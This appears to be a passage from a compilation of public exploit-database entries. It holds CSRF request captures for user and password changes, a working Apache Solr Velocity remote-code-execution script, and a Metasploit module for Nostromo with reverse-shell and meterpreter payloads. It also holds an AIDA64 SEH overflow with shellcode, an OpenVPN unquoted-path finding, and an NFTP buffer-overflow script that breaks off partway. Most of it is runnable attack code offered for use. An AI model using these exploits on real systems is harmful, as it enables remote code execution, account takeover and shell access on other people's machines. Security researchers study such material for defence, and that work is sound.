oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k ################################################################################################################################## # CSRF3 # Create User POST /index.php/settings/users/users HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 39 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k username=test&password=&email=test@test ################################################################################################################################## # CSRF4 # Delete User DELETE /index.php/settings/users/users/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k 
################################################################################################################################## # CSRF5 # Create Group POST /index.php/settings/users/groups HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 7 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k id=test ################################################################################################################################## # CSRF6 # Delete Group DELETE /index.php/settings/users/groups/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k ################################################################################################################################## # CSRF7 # Change User Full Name POST /index.php/settings/users/user/displayName HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) 
Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 37 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k displayName=user1&oldDisplayName=user ################################################################################################################################## # CSRF8 # Change User Email PUT /index.php/settings/users/user/mailAddress HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 31 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k mailAddress=user1%40example.com ################################################################################################################################## # CSRF9 # Change User Password POST /index.php/settings/personal/changepassword HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: 
application/x-www-form-urlencoded; charset=UTF-8 requesttoken: fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 62 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k oldpassword=1234&personal-password=1&personal-password-clone=1 ################################################################################################################################## # CSRF10 # Change Language POST /index.php/settings/ajax/setlanguage.php HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 7 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k lang=tr ##################################################################################################################################
  # Title: Apache Solr 8.2.0 - Remote Code Execution
# Date: 2019-11-01
# Author: @l3x_wong
# Vendor: https://lucene.apache.org/solr/
# Software Link: https://lucene.apache.org/solr/downloads.html
# CVE: N/A
# github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template
# usage: python3 script.py ip [port [command]]
# default port=8983
# default command=whoami
# note:
# Step1: Init Apache Solr Configuration
# Step2: Remote Exec in Every Solr Node

import sys
import json
import time
import requests


class initSolr(object):
    """Read-only reconnaissance against the Solr admin API.

    Both methods issue unauthenticated GETs to ``/solr/admin/...`` and
    swallow every exception, reporting failure through ``state == 0``.
    ``ip`` and ``port`` are concatenated into the URL as strings, so
    ``port`` must be passed as a ``str`` (as ``check()`` does).
    """

    # Evaluated once, when the class body runs at import time; every
    # instance reuses the same cache-buster value.
    timestamp_s = str(time.time()).split('.')
    timestamp = timestamp_s[0] + timestamp_s[1][0:-3]

    def __init__(self, ip: str, port: str) -> None:
        self.ip = ip
        self.port = port

    def get_nodes(self) -> dict:
        """List core names from ``/solr/admin/cores``.

        Returns a dict with ``node`` (list of core names, or ``None``),
        ``state`` (1 on success, 0 on any error) and ``msg``.  The bare
        ``except`` also masks non-JSON bodies and missing ``status`` keys.
        """
        payload = {
            '_': self.timestamp,
            'indexInfo': 'false',
            'wt': 'json'
        }
        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores'
        try:
            nodes_info = requests.get(url, params=payload, timeout=5)
            node = list(nodes_info.json()['status'].keys())
            state = 1
        except:
            node = ''
            state = 0
        # An empty core list is reported as a failure even when the
        # request itself succeeded (state stays 1 in that case).
        if node:
            return {
                'node': node,
                'state': state,
                'msg': 'Get Nodes Successfully'
            }
        else:
            return {
                'node': None,
                'state': state,
                'msg': 'Get Nodes Failed'
            }

    def get_system(self) -> dict:
        """Fetch OS name/uname/version from ``/solr/admin/info/system``.

        Returns ``{'system': {'name', 'uname', 'version', 'state'}}``;
        on any error the three strings are empty and ``state`` is 0.
        """
        payload = {
            '_': self.timestamp,
            'wt': 'json'
        }
        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system'
        try:
            system_info = requests.get(url=url, params=payload, timeout=5)
            # .json() re-parses the body on each access; harmless but redundant.
            os_name = system_info.json()['system']['name']
            os_uname = system_info.json()['system']['uname']
            os_version = system_info.json()['system']['version']
            state = 1
        except:
            os_name = ''
            os_uname = ''
            os_version = ''
            state = 0
        return {
            'system': {
                'name': os_name,
                'uname': os_uname,
                'version': os_version,
                'state': state
            }
        }


class apacheSolrRCE(object):
    """Two-step interaction with a single Solr core.

    ``init_node_config`` rewrites the core's config; ``rce`` then queries
    the core with a Velocity template.  All requests are unauthenticated
    HTTP with a 5-second timeout.
    """

    def __init__(self, ip: str, port: str, node: str, command: str) -> None:
        self.ip = ip
        self.port = port
        self.node = node
        self.command = command
        self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node

    def init_node_config(self) -> dict:
        """POST a config-API update enabling ``solr.VelocityResponseWriter``.

        The update sets ``params.resource.loader.enabled`` to ``'true'``,
        which is what later lets a template be supplied in request
        parameters.  A POST to ``/solr/<core>/config`` carrying this
        ``update-queryresponsewriter`` body is therefore the observable
        precondition worth alerting on.  Returns ``{'init', 'state'}``;
        only an HTTP 200 counts as success.
        """
        url = self.url + '/config'
        payload = {
            'update-queryresponsewriter': {
                'startup': 'lazy',
                'name': 'velocity',
                'class': 'solr.VelocityResponseWriter',
                'template.base.dir': '',
                'solr.resource.loader.enabled': 'true',
                'params.resource.loader.enabled': 'true'
            }
        }
        try:
            res = requests.post(url=url, data=json.dumps(payload), timeout=5)
            if res.status_code == 200:
                return {
                    'init': 'Init node config successfully',
                    'state': 1
                }
            else:
                return {
                    'init': 'Init node config failed',
                    'state': 0
                }
        except:
            return {
                'init': 'Init node config failed',
                'state': 0
            }

    def rce(self) -> str:
        """GET ``/select`` with ``wt=velocity`` and an inline custom template.

        ``self.command`` is spliced into the URL without any escaping, so a
        command containing ``&``, ``#`` or ``'`` would break the request.
        Success is detected indirectly: a rendered template is not JSON,
        so ``res.json()`` raises and the ``except`` branch returns the body.
        Note that the inner comparison against the string ``'0'`` has no
        effect -- both sides of that ``if`` return the same failure text.
        """
        url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
                          "%23set($x=%27%27)+"
                          "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+"
                          "%23set($chr=$x.class.forName(%27java.lang.Character%27))+"
                          "%23set($str=$x.class.forName(%27java.lang.String%27))+"
                          "%23set($ex=$rt.getRuntime().exec(%27" + self.command + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+"
                          "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")
        try:
            res = requests.get(url=url, timeout=5)
            if res.status_code == 200:
                try:
                    if res.json()['responseHeader']['status'] == '0':
                        return 'RCE failed @Apache Solr node %s\n' % self.node
                    else:
                        return 'RCE failed @Apache Solr node %s\n' % self.node
                except:
                    # Non-JSON body: the template was rendered; strip the
                    # stray leading/trailing '0' characters the writer emits.
                    return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0'))
            else:
                return 'RCE failed @Apache Solr node %s\n' % self.node
        except:
            return 'RCE failed @Apache Solr node %s\n' % self.node


def check(ip: str, port: str = '8983', command: str = 'whoami') -> None:
    """Enumerate cores, print the target OS info, then run both steps per core.

    ``get_nodes()`` is called twice on the success path (once for the
    state check, once for the list), i.e. two identical HTTP requests.
    Prints results; returns nothing.
    """
    system = initSolr(ip=ip, port=port)
    if system.get_nodes()['state'] == 0:
        print('No Nodes Found. Remote Exec Failed!')
    else:
        nodes = system.get_nodes()['node']
        systeminfo = system.get_system()
        os_name = systeminfo['system']['name']
        os_version = systeminfo['system']['version']
        print('OS Realese: %s, OS Version: %s\nif remote exec failed, '
              'you should change your command with right os platform\n' % (os_name, os_version))
        for node in nodes:
            res = apacheSolrRCE(ip=ip, port=port, node=node, command=command)
            init_node_config = res.init_node_config()
            if init_node_config['state'] == 1:
                print('Init node %s Successfully, exec command=%s' % (node, command))
                result = res.rce()
                print(result)
            else:
                print('Init node %s Failed, Remote Exec Failed\n' % node)


if __name__ == '__main__':
    # Positional CLI: ip [port [command]]; port is kept as a string on purpose.
    usage = ('python3 script.py ip [port [command]]\n '
             '\t\tdefault port=8983\n '
             '\t\tdefault command=whoami')
    if len(sys.argv) == 4:
        ip = sys.argv[1]
        port = sys.argv[2]
        command = sys.argv[3]
        check(ip=ip, port=port, command=command)
    elif len(sys.argv) == 3:
        ip = sys.argv[1]
        port = sys.argv[2]
        check(ip=ip, port=port)
    elif len(sys.argv) == 2:
        ip = sys.argv[1]
        check(ip=ip)
    else:
        print('Usage: %s:\n' % usage)
  ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Nostromo nhttpd <= 1.9.6 (CVE-2019-16278): a directory traversal in
# `http_verify` lets a crafted POST reach `/bin/sh`.  The module offers an
# in-memory command target and a Linux dropper target; `check` relies solely
# on the `Server` response header.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Nostromo Directory Traversal Remote Command Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in
        Nostromo <= 1.9.6. This issue is caused by a directory traversal
        in the function `http_verify` in nostromo nhttpd allowing an
        attacker to achieve remote code execution via a crafted HTTP request.
      },
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin[at]gmail.com>', # metasploit module
          'sp0re', # original public exploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-16278'],
          [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
        ],
      'Platform'       => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
      'Targets'        =>
        [
          ['Automatic (Unix In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
            }
          ],
          ['Automatic (Linux Dropper)',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
            }
          ]
        ],
      'DisclosureDate' => 'Oct 20 2019',
      'DefaultTarget'  => 0,
      'Notes'          =>
        {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
    ))

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])
  end

  # Version check from the `Server` header only.
  #
  # Returns CheckCode::Unknown when no response arrives, CheckCode::Appears
  # when the header advertises a `nostromo x.y.z` version <= 1.9.6, and
  # CheckCode::Safe otherwise.  `[\d.]{5}` only matches a five-character
  # version string, so a banner such as `nostromo 1.9.10` would not match
  # and would be reported as Safe.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
    })
    unless res
      vprint_error("Connection failed")
      return CheckCode::Unknown
    end
    if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/
      # A regex literal on the left of =~ binds the named capture `version`
      # as a local variable.
      /nostromo (?<version>[\d.]{5})/ =~ res.headers['Server']
      if Gem::Version.new(version) <= Gem::Version.new('1.9.6')
        return CheckCode::Appears
      end
    end
    return CheckCode::Safe
  end

  # Sends `cmd` to `/bin/sh` via the `.%0d./` traversal path.
  #
  # The two leading `echo` lines pad the body; `2>&1` folds stderr into the
  # response.  Returns the Rex HTTP response (nil on connection failure).
  # NOTE(review): the header name is written as 'Content-Length:' with a
  # trailing colon; confirm how that is rendered on the wire before relying
  # on it, since the server-side parser may see a malformed header.
  def execute_command(cmd, opts = {})
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'),
      'headers' => {'Content-Length:' => '1'},
      'data' => "echo\necho\n#{cmd} 2>&1"
    })
  end

  # Runs `check` (unless ForceExploit) and then dispatches on target type.
  # For the in-memory target with `cmd/unix/generic` the raw response body
  # is printed as command output; the dropper target delegates to CmdStager.
  def exploit
    # These CheckCodes are allowed to pass automatically
    checkcodes = [ CheckCode::Appears, CheckCode::Vulnerable ]
    unless checkcodes.include?(check) || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    print_status("Configuring #{target.name} target")

    case target['Type']
    when :unix_memory
      print_status("Sending #{datastore['PAYLOAD']} command payload")
      vprint_status("Generated command payload: #{payload.encoded}")
      res = execute_command(payload.encoded)
      if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
        print_warning('Dumping command output in full response body')
        if res.body.empty?
          print_error('Empty response body, no command output')
          return
        end
        print_line(res.body)
      end
    when :linux_dropper
      print_status("Sending #{datastore['PAYLOAD']} command stager")
      execute_cmdstager
    end
  end
end
  # Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
# Date: 2019-10-28
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage: https://www.aida64.com
# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
# Version: AIDA64 Enginner 6.10.5200
# Tested on: Windows 7 Home Basic SP1
# CVE : N/A

# Step
# 1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
# 2) Paste payload from "aida64.txt" -> Apply
# 3) File -> Exit

# Exploit Code
#! Python
# Python 2 script: `buf`/`payload` are byte strings and the file is written in
# binary mode.  Output is a single file, aida64.txt, in the current directory.
import struct

# shell code (opaque byte string as published; not annotated further here)
buf = ""
buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
buf += "\x76\x74\x33\x79\x76\x35\x41\x41"

# Exploit Payload
# Layout: 1111 filler bytes, the 4-byte nSEH record, the 4-byte SEH handler
# address, 16 NOPs, the shellcode, then 1000 trailing bytes.  Both addresses
# are packed little-endian ('<L').
sehNext = struct.pack('<L',0x909010EB)   # SHORT JMP
sehHandler = struct.pack('<L',0x0120c8b6)   # POP POP RET
payload = 'A' * (1115 - 4) + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000

# Written in binary mode so the non-ASCII bytes are not altered.
f = open("aida64.txt", "wb")
f.write(payload)
f.close()
  20. # Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2019-11-03 # Vendor Homepage: https://openvpn.net # Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi # Tested Version: 3.0.0.(272) # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Steps to discover the unquoted service path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """ OpenVPN Agent agent_ovpnconnect agent_ovpnconnect C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe Auto # Service info: C:\>sc qc agent_ovpnconnect [SC] QueryServiceConfig SUCCESS SERVICE_NAME: agent_ovpnconnect TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenVPN Agent agent_ovpnconnect DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  # Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
# Date: 2019-11-03
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
# Version: 1.71
# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222

# Steps to reproduce:
# Run the server with the valid Windows version
# Connect the client to the malicious server
# bind shell on port 5150

#!/usr/bin/env python2
# Python 2 script (except-comma syntax, raw_input, str as bytes).  It stands
# up a minimal fake FTP server on a hard-coded address and answers the
# client's SYST command with the oversized `sploit` buffer.
import os, sys, socket

NARGS = len(sys.argv)

# ntdll.dll
# dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# kernel32.dll
# dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
# 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll
# 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll
# 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll
# 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll
# Per-service-pack return addresses (little-endian byte strings), keyed by the
# name the user passes on the command line.
tourRETs = {
    "XPProSP3": "\x95\x3A\x92\x7c",
    "XPProSP2": "\x43\x75\x92\x7C",
    "XPProSP1": "\xc7\x41\xe6\x77",
    "XPProSP0": "\xf3\x67\xe6\x77"
}

if not NARGS > 1:
    print("USAGE: %s version" % sys.argv[0])
    print("[.] version must be in:")
    for item in tourRETs:
        print("\t%s" % item)
    sys.exit(1)

# sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP
# ESP and ESI both pointers to somewhere in the As
# If I increase the overflow string to 10000, the area ESP points to at crash
#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
# sploit = "A"*10000
# sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000)
# 46326846 in EIP
# `locate pattern_offset.rb |head -n 1` 46326846 10000
# 4116
# Offset to the saved return address, as determined by the author's notes above.
sploit = "A"*4116

# Add the return address
# Unknown version names surface as KeyError (Python 2 except syntax).
try:
    sploit += tourRETs[sys.argv[1]]
except KeyError, x:
    print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x))
    sys.exit(1)

sploit += ("\x90"*12)
# original calcs based on RET*4... oops. realign.
# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc
# 0x69D (1693); ESP-ESI
sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs

# badchars = "\x00\x0a\x0d"
# locate EIP and align ESP to a close future 4 and 16 byte boundary
# NOTES is documentation only; it is never sent or printed.
NOTES = """\
$-37 > D9EE FLDZ
$-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
$-31 > 59 POP ECX
$-30 > 80C1 09 ADD CL,9
$-2D > 80C1 04 ADD CL,4
$-2A > 80C1 2A ADD CL,2A
$-27 > 80C5 01 ADD CH,1
$-24 > 51 PUSH ECX
$-23 > 5C POP ESP
"""
sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
sploit += "\x90" * 0x22 # ESP = EIP
